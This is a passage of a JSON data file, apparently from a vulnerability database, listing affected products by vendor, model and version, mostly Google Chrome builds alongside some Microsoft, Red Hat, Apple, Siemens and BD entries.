        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.168"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1286.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.703.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.668.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.744.0"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.133"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1078.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.328.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.91"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.381.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.144"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1283.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.711.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.330"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.21"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.147"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.797.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.14443"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.521.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.46"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "pyxis cathrack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.774.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.350.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.803.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.49"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.155"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.623.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.345.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.215"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1001.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.859.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1674.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.930.0"
      },
      {
        "model": "pyxis specimen collection verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.50"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.562.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "55.0.2883.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.798.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.227"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.302"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.416.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.59"
      },
      {
        "model": "gencell clic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.647.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.937.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.277.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.350.1"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.136"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.867.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.329"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.746.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1287.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.753.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.59"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1038.0"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.288.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.7"
      },
      {
        "model": "bactec fx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.496.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.294.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.728.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.7"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.824.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.706.0"
      },
      {
        "model": "lyse wash assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.453.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.585.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.557.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.80"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.549.0"
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.12.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.314.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.207"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.440.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.343.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1053.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.957.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.52"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.573.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1055"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.806.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.13"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.863.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.652.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.29"
      },
      {
        "model": "simatic ipc227e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.33"
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.13.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.719.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.952.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.401.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.495.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1019"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.872.0"
      },
      {
        "model": "simatic hmi comfort pro panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1022.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.153"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.341.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.11"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.223"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1657.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1273.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
